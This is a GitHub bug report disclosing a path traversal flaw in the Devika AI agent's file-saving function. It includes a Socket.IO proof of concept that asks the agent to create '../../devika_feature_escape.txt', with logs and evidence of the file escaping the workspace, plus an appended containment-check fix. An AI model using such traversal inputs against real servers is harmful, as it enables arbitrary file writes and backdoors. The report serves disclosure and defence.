[Bug] Feature Agent path traversal vulnerability #708

@Ro1ME

Describe the bug

CRITICAL SECURITY VULNERABILITY: The Feature Agent's save_code_to_project function contains a path traversal vulnerability that allows attackers to write files outside the intended project workspace, potentially compromising the entire server.

Vulnerability Type: CWE-22 Path Traversal
CVSS Score: 8.8 (High)
Affected File: src/agents/feature/feature.py:71
Affected Function: Feature.save_code_to_project
Entry Point: Socket.IO user-message event (action=feature)

Root Cause: The function constructs file paths using user-controlled input without proper boundary validation:

# Line 71 - VULNERABLE CODE
file_path = os.path.join(project_path, file_name)  # No path validation
with open(file_path, 'w') as f:
    f.write(code)

Security Impact:

  • Arbitrary File Write: Write files anywhere on the server filesystem
  • Code Execution: Overwrite Python modules or system files
  • Data Exfiltration: Write sensitive data to web-accessible directories
  • Persistence: Plant backdoors in startup scripts

How To Reproduce

Steps to reproduce the behavior (example):

Prerequisites

  1. Start Devika server:

    cd devika
    python3 -m venv venv
    source venv/bin/activate  # On Windows: venv\Scripts\activate
    pip install -r requirements.txt
    python app.py

  2. Access web UI at http://localhost:1337

  3. Create a new project via the UI

Steps to reproduce the behavior

  1. Connect to Socket.IO endpoint:

    import socketio
    
    sio = socketio.Client()
    sio.connect('http://localhost:1337')

  2. Create baseline project file:

    # First message: create a normal file
    sio.emit('user-message', {
        'message': 'Add a new feature: create bootstrap.py',
        'project_name': 'cbdscan-feature-demo'
    })
    
    # Wait for completion...

  3. Trigger Feature agent with path traversal:

    # Second message: path traversal attack
    sio.emit('user-message', {
        'message': 'Add feature: create file ../../devika_feature_escape.txt',
        'project_name': 'cbdscan-feature-demo'
    })

  4. Verify file escaped project workspace:

    # Check that file exists outside project directory
    ls data/devika_feature_escape.txt
    cat data/devika_feature_escape.txt
    # Output: DEVIKA_FEATURE_LIVE_POC

Expected behavior

  • File paths should be validated and normalized before writing
  • Paths containing .. should be rejected or sanitized
  • All file operations should be confined to the project workspace
  • Absolute paths should be rejected

Screenshots and logs

Backend Logs:

[2026-04-10 04:13:56] Agent: Feature
[2026-04-10 04:13:56] State: completed
[2026-04-10 04:13:56] Terminal: vim bootstrap.py
[2026-04-10 04:13:56] Output: print('bootstrap')

[2026-04-10 04:13:59] Agent: Feature
[2026-04-10 04:13:59] State: completed
[2026-04-10 04:13:59] Terminal: vim ../../devika_feature_escape.txt
[2026-04-10 04:13:59] Output: DEVIKA_FEATURE_LIVE_POC
[2026-04-10 04:13:59] WARNING: File written outside project workspace!

Validation Evidence:

{
  "mode": "feature",
  "project_name": "cbdscan-feature-demo",
  "project_root": "data/projects/cbdscan-feature-demo",
  "baseline_project_file": "data/projects/cbdscan-feature-demo/bootstrap.py",
  "baseline_project_file_exists": true,
  "escape_target": "data/devika_feature_escape.txt",
  "escape_target_exists": true,
  "escape_target_within_project_root": false,
  "escape_target_content": "DEVIKA_FEATURE_LIVE_POC"
}

File System Evidence:

data/
├── projects/
│   └── cbdscan-feature-demo/
│       └── bootstrap.py              ✓ Expected location
└── devika_feature_escape.txt         ❌ ESCAPED PROJECT WORKSPACE

Configuration

- OS: Windows
- Python version: 3.10
- Node version: 8.0.0
- bun version:  0.1.0
- search engine: google
- Model: gpt-4

Additional context

Validation Status: CONFIRMED with real Socket.IO entry point

Attack Execution Flow:

User Message (Socket.IO)
    ↓
Agent.subsequent_execute(action=feature)
    ↓
Feature.execute()
    ↓
Feature.save_code_to_project(code, "../../escape.txt")
    ↓
File written outside workspace 
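
A containment check that enforces the four points under "Expected behavior", shown as an added example that is not part of the original report and not Devika's own code. The names `resolve_in_workspace`, `save_code_safely` and `PathEscapeError` are hypothetical, and the function signature is an assumption rather than the project's actual one.

```python
import os


class PathEscapeError(ValueError):
    """The requested file name would resolve outside the project workspace."""


def resolve_in_workspace(project_path: str, file_name: str) -> str:
    """Return an absolute path for file_name that is guaranteed to sit under project_path."""
    if not file_name or "\x00" in file_name:
        raise PathEscapeError("empty file name or NUL byte")
    # Treat '\' as a separator too, so the check is identical on Windows and POSIX.
    normalized = file_name.replace("\\", "/")
    parts = [p for p in normalized.split("/") if p not in ("", ".")]
    if normalized.startswith("/") or os.path.isabs(file_name):
        raise PathEscapeError("absolute paths are not allowed")
    if not parts or ":" in parts[0]:  # conservative: also rejects drive-style names (C:...)
        raise PathEscapeError("no usable file name, or drive-qualified name")
    if ".." in parts:
        raise PathEscapeError("'..' components are not allowed")
    # Resolve symlinks on both sides, then confirm the target is still under the root.
    root = os.path.realpath(project_path)
    candidate = os.path.realpath(os.path.join(root, *parts))
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        raise PathEscapeError("resolved path leaves the project workspace")
    return candidate


def save_code_safely(project_path: str, file_name: str, code: str) -> str:
    """Hypothetical replacement for the unchecked os.path.join + open shown in the report."""
    file_path = resolve_in_workspace(project_path, file_name)
    os.makedirs(os.path.dirname(file_path), exist_ok=True)
    with open(file_path, "w") as f:
        f.write(code)
    return file_path
```

The check and the `open` call are separate steps, so this assumes no other process can swap a symlink into the workspace between them.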
